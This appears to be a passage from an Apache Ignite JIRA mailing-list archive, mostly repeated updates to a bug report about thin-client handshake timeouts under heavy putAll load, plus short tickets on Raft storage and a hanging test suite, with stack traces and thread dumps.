at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at 

[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In use cases with several active thin clients producing noticeable load on the 
cluster, new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On the server side, the warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from one or several thin clients, especially for TRANSACTIONAL 
caches. ATOMIC caches are also affected; the only difference is that for 
ATOMIC caches a higher parallelism factor and larger putAll batches are needed.

The root cause is that a single queue in the Ignite node is used to serve all 
thin-client-related requests (the queue in the {_}GridThinClientExecutor{_}): 
both working requests like _putAll_ and control ones like _handshake_, which 
are used for connection establishment.

Working requests can live indefinitely in the queue (or at least longer than 
{_}handshake{_}). On the other hand, a special watchdog timer is scheduled in 
the Ignite node to check whether a _handshake_ request is processed in a 
timely manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}). By 
default, a 10-second timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If the timeout 
expires, the client session is closed forcibly.

So, if one or several thin clients fill the queue with long operations, new 
clients cannot connect.

The real use case that revealed the problem is as follows.
 * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
 * One TRANSACTIONAL cache with backups=1
 * About 30 GB of data on each node
 * Several (up to 70-100 at the same time) thin clients loading data using 
putAlls in 5-record batches. A client connects, loads 3 batches and 
disconnects (Spark jobs, in fact).
 * Default handshakeTimeout (10 seconds) and threadPoolSize (8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate the problem.

*{color:#ff}Note that the asserts in the test cases are written so that a test 
PASS means that the problem IS reproduced.{color}* The tests check that at 
least one thin client fails with the "Channel is closed" error and that the 
server node log contains a warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the real-life use case above. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters: one for a 
TRANSACTIONAL and one for an ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

A minimal test showing that a single thin client can produce enough load that 
another one cannot connect.

The attached metrics screenshot shows the behaviour of the test in detail:

!test_one_greedy_thin_client.png|thumbnail, width=300,height=400!

 

***

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.<init>(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at org.apache.ignite.Ignition.startClient(Ignition.java:615) ~[classes/:?]
at 
org.apache.ignite.internal.ducktest.tests.thin_client_test.ThinClientDataGenerationApplication$PutJob.getClient(ThinClientDataGenerationApplication.java:181)
 ~[ignite-ducktests-2.
14.0-SNAPSHOT.jar:2.14.0-SNAPSHOT]
at 

[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In use cases with several active thin clients producing noticeable load on the 
cluster, new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On the server side, the warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from one or several thin clients, especially for TRANSACTIONAL 
caches. ATOMIC caches are also affected; the only difference is that for 
ATOMIC caches a higher parallelism factor and larger putAll batches are needed.

The root cause is that a single queue in the Ignite node is used to serve all 
thin-client-related requests (the queue in the {_}GridThinClientExecutor{_}): 
both working requests like _putAll_ and control ones like _handshake_, which 
are used for connection establishment.

Working requests can live indefinitely in the queue (or at least longer than 
{_}handshake{_}). On the other hand, a special watchdog timer is scheduled in 
the Ignite node to check whether a _handshake_ request is processed in a 
timely manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}). By 
default, a 10-second timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If the timeout 
expires, the client session is closed forcibly.

So, if one or several thin clients fill the queue with long operations, new 
clients cannot connect.

The real use case that revealed the problem is as follows.
 * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
 * One TRANSACTIONAL cache with backups=1
 * About 30 GB of data on each node
 * Several (up to 70-100 at the same time) thin clients loading data using 
putAlls in 5-record batches. A client connects, loads 3 batches and 
disconnects (Spark jobs, in fact).
 * Default handshakeTimeout (10 seconds) and threadPoolSize (8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate the problem.

*{color:#ff}Note that the asserts in the test cases are written so that a test 
PASS means that the problem IS reproduced.{color}* The tests check that at 
least one thin client fails with the "Channel is closed" error and that the 
server node log contains a warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the real-life use case above. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters: one for a 
TRANSACTIONAL and one for an ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

A minimal test showing that a single thin client can produce enough load that 
another one cannot connect.

The attached metrics screenshot shows the behaviour of the test in detail:

 

***

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.<init>(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at org.apache.ignite.Ignition.startClient(Ignition.java:615) ~[classes/:?]
at 
org.apache.ignite.internal.ducktest.tests.thin_client_test.ThinClientDataGenerationApplication$PutJob.getClient(ThinClientDataGenerationApplication.java:181)
 ~[ignite-ducktests-2.
14.0-SNAPSHOT.jar:2.14.0-SNAPSHOT]
at 
org.apache.ignite.internal.ducktest.tests.thin_client_test.ThinClientDataGenerationApplication$PutJob.call(ThinClientDataGenerationApplication.java:138)
 

[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Attachment: test_one_greedy_thin_client.png

> Timeout while thin client connection
> 
>
> Key: IGNITE-16843
> URL: https://issues.apache.org/jira/browse/IGNITE-16843
> Project: Ignite
>  Issue Type: Bug
>Reporter: Sergey Korotkov
>Priority: Minor
> Attachments: test_one_greedy_thin_client.png
>
>
> In use cases with several active thin clients producing noticeable load on 
> the cluster, new thin clients can fail to connect with the 
> *"ClientConnectionException: Channel is closed"* error in the 
> *TcpClientChannel::handshake()* method.
> On the server side, the warning *"Unable to perform handshake within timeout 
> [timeout=1"* is logged.
> The problem can be easily reproduced by several large putAlls invoked in 
> parallel from one or several thin clients, especially for TRANSACTIONAL 
> caches. ATOMIC caches are also affected; the only difference is that for 
> ATOMIC caches a higher parallelism factor and larger putAll batches are 
> needed.
> 
> The root cause is that a single queue in the Ignite node is used to serve 
> all thin-client-related requests (the queue in the 
> {_}GridThinClientExecutor{_}): both working requests like _putAll_ and 
> control ones like _handshake_, which are used for connection establishment.
> Working requests can live indefinitely in the queue (or at least longer than 
> {_}handshake{_}). On the other hand, a special watchdog timer is scheduled 
> in the Ignite node to check whether a _handshake_ request is processed in a 
> timely manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}). 
> By default, a 10-second timeout is used 
> ({_}ClientConnectorConfiguration::handshakeTimeout{_}). If the timeout 
> expires, the client session is closed forcibly.
> So, if one or several thin clients fill the queue with long operations, new 
> clients cannot connect. 
> 
> The real use case that revealed the problem is as follows.
>  * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
>  * One TRANSACTIONAL cache with backups=1
>  * About 30 GB of data on each node
>  * Several (up to 70-100 at the same time) thin clients loading data using 
> putAlls in 5-record batches. A client connects, loads 3 batches and 
> disconnects (Spark jobs, in fact).
>  * Default handshakeTimeout (10 seconds) and threadPoolSize (8) in 
> ClientConnectorConfiguration
> 
> Two ducktests were created to reproduce and isolate the problem.
> *{color:#ff}Note that the asserts in the test cases are written so that a 
> test PASS means that the problem IS reproduced.{color}* The tests check that 
> at least one thin client fails with the "Channel is closed" error and that 
> the server node log contains a warning about the handshake timeout.
> *ThinClientConcurrencyTest::test_many_thin_clients*
> Mimics the real-life use case above. Several thin client processes invoke 
> putAlls in several threads. There are two sets of parameters: one for a 
> TRANSACTIONAL and one for an ATOMIC cache.
> *ThinClientConcurrencyTest::test_one_greedy_thin_client*
> A minimal test showing that a single thin client can produce enough load 
> that another one cannot connect.
> The attached metrics screenshot shows the behaviour of the test in detail:
>  
> ***
> The following full stack trace is logged on the client side:
> {noformat}
> org.apache.ignite.client.ClientConnectionException: Channel is closed
> at 
> org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.TcpClientChannel.<init>(TcpClientChannel.java:180)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:126)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:102)
>  ~[classes/:?]
> at 
> 

[jira] [Created] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)
Sergey Korotkov created IGNITE-16843:


 Summary: Timeout while thin client connection
 Key: IGNITE-16843
 URL: https://issues.apache.org/jira/browse/IGNITE-16843
 Project: Ignite
  Issue Type: Bug
Reporter: Sergey Korotkov


In use cases with several active thin clients producing noticeable load on the 
cluster, new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On the server side, the warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from one or several thin clients, especially for TRANSACTIONAL 
caches. ATOMIC caches are also affected; the only difference is that for 
ATOMIC caches a higher parallelism factor and larger putAll batches are needed.

The root cause is that a single queue in the Ignite node is used to serve all 
thin-client-related requests (the queue in the {_}GridThinClientExecutor{_}): 
both working requests like _putAll_ and control ones like _handshake_, which 
are used for connection establishment.

Working requests can live indefinitely in the queue (or at least longer than 
{_}handshake{_}). On the other hand, a special watchdog timer is scheduled in 
the Ignite node to check whether a _handshake_ request is processed in a 
timely manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}). By 
default, a 10-second timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If the timeout 
expires, the client session is closed forcibly.

So, if one or several thin clients fill the queue with long operations, new 
clients cannot connect.

The real use case that revealed the problem is as follows.
 * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
 * One TRANSACTIONAL cache with backups=1
 * About 30 GB of data on each node
 * Several (up to 70-100 at the same time) thin clients loading data using 
putAlls in 5-record batches. A client connects, loads 3 batches and 
disconnects (Spark jobs, in fact).
 * Default handshakeTimeout (10 seconds) and threadPoolSize (8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate the problem.

*{color:#FF}Note that the asserts in the test cases are written so that a test 
PASS means that the problem IS reproduced.{color}* The tests check that at 
least one thin client fails with the "Channel is closed" error and that the 
server node log contains a warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the real-life use case above. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters: one for a 
TRANSACTIONAL and one for an ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

A minimal test showing that a single thin client can produce enough load that 
another one cannot connect.

***

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.<init>(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.<init>(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at org.apache.ignite.Ignition.startClient(Ignition.java:615) ~[classes/:?]
at 
org.apache.ignite.internal.ducktest.tests.thin_client_test.ThinClientDataGenerationApplication$PutJob.getClient(ThinClientDataGenerationApplication.java:181)
 ~[ignite-ducktests-2.
14.0-SNAPSHOT.jar:2.14.0-SNAPSHOT]
at 

[jira] [Created] (IGNITE-16842) Remove topology listeners if Raft leadership is lost

2022-04-13 Thread Aleksandr Polovtcev (Jira)
Aleksandr Polovtcev created IGNITE-16842:


 Summary: Remove topology listeners if Raft leadership is lost
 Key: IGNITE-16842
 URL: https://issues.apache.org/jira/browse/IGNITE-16842
 Project: Ignite
  Issue Type: Task
Reporter: Aleksandr Polovtcev


When a CMG leader is elected, it registers a Topology Listener to propagate 
the Cluster State. After leadership is lost, this listener should be 
de-registered so that old leaders stop propagating the Cluster State alongside 
the newly elected leader.
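
A minimal sketch of the intended behaviour; the interfaces below are 
hypothetical stand-ins for the Ignite 3 internals, not the actual API:
{code:java}
// Hypothetical types standing in for Ignite 3 internals.
interface TopologyEventHandler { void onTopologyChanged(); }

interface TopologyService {
    void addEventHandler(TopologyEventHandler handler);
    void removeEventHandler(TopologyEventHandler handler);
}

// Ties topology-listener registration to Raft leadership: register on
// election, de-register on leadership loss.
class ClusterStatePropagator {
    private final TopologyService topologySvc;
    private TopologyEventHandler handler;

    ClusterStatePropagator(TopologyService topologySvc) {
        this.topologySvc = topologySvc;
    }

    synchronized void onLeaderElected() {
        handler = () -> { /* propagate the Cluster State */ };
        topologySvc.addEventHandler(handler);
    }

    synchronized void onLeadershipLost() {
        if (handler != null) {
            topologySvc.removeEventHandler(handler);
            handler = null;
        }
    }
}
{code}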



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Created] (IGNITE-16841) Use common RocksDB instance in Raft Storage

2022-04-13 Thread Aleksandr Polovtcev (Jira)
Aleksandr Polovtcev created IGNITE-16841:


 Summary: Use common RocksDB instance in Raft Storage
 Key: IGNITE-16841
 URL: https://issues.apache.org/jira/browse/IGNITE-16841
 Project: Ignite
  Issue Type: Task
Reporter: Aleksandr Polovtcev
Assignee: Aleksandr Polovtcev


RocksDbRaft storage uses its own underlying RocksDB instance. It should be 
replaced with a common RocksDB instance for better resource utilization and 
performance.
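
One common way to share a single physical RocksDB instance between several 
logical storages is column families. A minimal sketch with the RocksDB Java 
API (the path and column family names are arbitrary):
{code:java}
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import org.rocksdb.ColumnFamilyDescriptor;
import org.rocksdb.ColumnFamilyHandle;
import org.rocksdb.DBOptions;
import org.rocksdb.RocksDB;

public class SharedRocksDb {
    public static void main(String[] args) throws Exception {
        RocksDB.loadLibrary();

        // One column family per logical storage inside a single instance.
        List<ColumnFamilyDescriptor> descriptors = Arrays.asList(
            new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
            new ColumnFamilyDescriptor("raft-log".getBytes()),
            new ColumnFamilyDescriptor("raft-meta".getBytes()));

        List<ColumnFamilyHandle> handles = new ArrayList<>();

        try (DBOptions opts = new DBOptions()
                 .setCreateIfMissing(true)
                 .setCreateMissingColumnFamilies(true);
             RocksDB db = RocksDB.open(opts, "/tmp/raft-storage",
                 descriptors, handles)) {
            db.put(handles.get(1), "key".getBytes(), "value".getBytes());
        }
    }
}
{code}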



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Comment Edited] (IGNITE-16805) Cache Restarts 1 suite hangs

2022-04-13 Thread Pavel Pereslegin (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17521530#comment-17521530
 ] 

Pavel Pereslegin edited comment on IGNITE-16805 at 4/13/22 8:08 AM:


The suite was run on TC 200+ times with no hangs.

The fix only includes changes to prevent hanging when the node stops. The 
optimistic tx test still sometimes fails and this should be investigated 
separately.


was (Author: xtern):
The suite was run on TC 200+ times with no hangs.

The patch only includes fixes to prevent hanging when the node stops. The 
optimistic tx test still sometimes fails and this should be investigated 
separately.

> Cache Restarts 1 suite hangs
> 
>
> Key: IGNITE-16805
> URL: https://issues.apache.org/jira/browse/IGNITE-16805
> Project: Ignite
>  Issue Type: Bug
>Reporter: Pavel Pereslegin
>Assignee: Pavel Pereslegin
>Priority: Minor
> Fix For: 2.14
>
>  Time Spent: 40m
>  Remaining Estimate: 0h
>
> h5. Cache Restarts 1 suite hangs on TeamCity due to 
> GridCachePartitionedOptimisticTxNodeRestartTest test.
> https://ci.ignite.apache.org/viewType.html?buildTypeId=IgniteTests24Java8_CacheRestarts1=buildTypeHistoryList_IgniteTests24Java8=%3Cdefault%3E
> {noformat}
>  Thread 
> [name="test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%",
>  id=383240, state=WAITING, blockCnt=20, waitCnt=42]
>  Lock [object=java.lang.Thread@686cf8ad, ownerName=null, ownerId=-1]
>  at java.base@11.0.8/java.lang.Object.wait(Native Method)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1305)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1380)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.checkRestartWithTx(GridCacheAbstractNodeRestartSelfTest.java:850)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.testRestartWithTxTenNodesTwoBackups(GridCacheAbstractNodeRestartSelfTest.java:543)
>  at 
> o.a.i.i.processors.cache.distributed.near.GridCachePartitionedOptimisticTxNodeRestartTest.testRestartWithTxTenNodesTwoBackups(GridCachePartitionedOptimisticTxNodeRestartTest.java:141)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native 
> Method)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>  at 
> java.base@11.0.8/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>  at java.base@11.0.8/java.lang.reflect.Method.invoke(Method.java:566)
>  at 
> org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:50)
>  at 
> org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)
> at 
> org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:47)
>  at 
> org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)
>  at 
> o.a.i.testframework.junits.GridAbstractTest$6.run(GridAbstractTest.java:2431)
>  at java.base@11.0.8/java.lang.Thread.run(Thread.java:834)
> 
> "test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%" 
> #383240 prio=5 os_prio=0 cpu=649.37ms elapsed=6627.99s tid=0x7f69575ff000 
> nid=0x6474 waiting on condition  [0x7f68edcc2000]
>java.lang.Thread.State: WAITING (parking)
>   at jdk.internal.misc.Unsafe.park(java.base@11.0.8/Native Method)
>   - parking to wait for  <0x87987d88> (a 
> java.util.concurrent.CountDownLatch$Sync)
>   at 
> java.util.concurrent.locks.LockSupport.park(java.base@11.0.8/LockSupport.java:194)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.parkAndCheckInterrupt(java.base@11.0.8/AbstractQueuedSynchronizer.java:885)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1039)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.acquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1345)
>   at 
> java.util.concurrent.CountDownLatch.await(java.base@11.0.8/CountDownLatch.java:232)
>   at 
> org.apache.ignite.internal.util.IgniteUtils.awaitQuiet(IgniteUtils.java:8106)
>   at 
> org.apache.ignite.internal.IgnitionEx$IgniteNamedInstance.grid(IgnitionEx.java:1657)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1292)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1270)
>   at org.apache.ignite.Ignition.allGrids(Ignition.java:503)
>   at 
> 

[jira] [Comment Edited] (IGNITE-16805) Cache Restarts 1 suite hangs

2022-04-13 Thread Pavel Pereslegin (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17521530#comment-17521530
 ] 

Pavel Pereslegin edited comment on IGNITE-16805 at 4/13/22 8:07 AM:


The suite was run on TC 200+ times with no hangs.

The patch only includes fixes to prevent hanging when the node stops. The 
optimistic tx test still sometimes fails and this should be investigated 
separately.


was (Author: xtern):
The suite was run on TC 200+ times with no hangs.

The fix only includes fixes to prevent hanging when the node stops. The 
optimistic tx test still sometimes fails and this should be investigated 
separately.

> Cache Restarts 1 suite hangs
> 
>
> Key: IGNITE-16805
> URL: https://issues.apache.org/jira/browse/IGNITE-16805
> Project: Ignite
>  Issue Type: Bug
>Reporter: Pavel Pereslegin
>Assignee: Pavel Pereslegin
>Priority: Minor
> Fix For: 2.14
>
>  Time Spent: 40m
>  Remaining Estimate: 0h
>
> h5. Cache Restarts 1 suite hangs on TeamCity due to 
> GridCachePartitionedOptimisticTxNodeRestartTest test.
> https://ci.ignite.apache.org/viewType.html?buildTypeId=IgniteTests24Java8_CacheRestarts1=buildTypeHistoryList_IgniteTests24Java8=%3Cdefault%3E
> {noformat}
>  Thread 
> [name="test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%",
>  id=383240, state=WAITING, blockCnt=20, waitCnt=42]
>  Lock [object=java.lang.Thread@686cf8ad, ownerName=null, ownerId=-1]
>  at java.base@11.0.8/java.lang.Object.wait(Native Method)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1305)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1380)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.checkRestartWithTx(GridCacheAbstractNodeRestartSelfTest.java:850)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.testRestartWithTxTenNodesTwoBackups(GridCacheAbstractNodeRestartSelfTest.java:543)
>  at 
> o.a.i.i.processors.cache.distributed.near.GridCachePartitionedOptimisticTxNodeRestartTest.testRestartWithTxTenNodesTwoBackups(GridCachePartitionedOptimisticTxNodeRestartTest.java:141)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native 
> Method)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>  at 
> java.base@11.0.8/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>  at java.base@11.0.8/java.lang.reflect.Method.invoke(Method.java:566)
>  at 
> org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:50)
>  at 
> org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)
> at 
> org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:47)
>  at 
> org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)
>  at 
> o.a.i.testframework.junits.GridAbstractTest$6.run(GridAbstractTest.java:2431)
>  at java.base@11.0.8/java.lang.Thread.run(Thread.java:834)
> 
> "test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%" 
> #383240 prio=5 os_prio=0 cpu=649.37ms elapsed=6627.99s tid=0x7f69575ff000 
> nid=0x6474 waiting on condition  [0x7f68edcc2000]
>java.lang.Thread.State: WAITING (parking)
>   at jdk.internal.misc.Unsafe.park(java.base@11.0.8/Native Method)
>   - parking to wait for  <0x87987d88> (a 
> java.util.concurrent.CountDownLatch$Sync)
>   at 
> java.util.concurrent.locks.LockSupport.park(java.base@11.0.8/LockSupport.java:194)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.parkAndCheckInterrupt(java.base@11.0.8/AbstractQueuedSynchronizer.java:885)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1039)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.acquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1345)
>   at 
> java.util.concurrent.CountDownLatch.await(java.base@11.0.8/CountDownLatch.java:232)
>   at 
> org.apache.ignite.internal.util.IgniteUtils.awaitQuiet(IgniteUtils.java:8106)
>   at 
> org.apache.ignite.internal.IgnitionEx$IgniteNamedInstance.grid(IgnitionEx.java:1657)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1292)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1270)
>   at org.apache.ignite.Ignition.allGrids(Ignition.java:503)
>   at 
> 

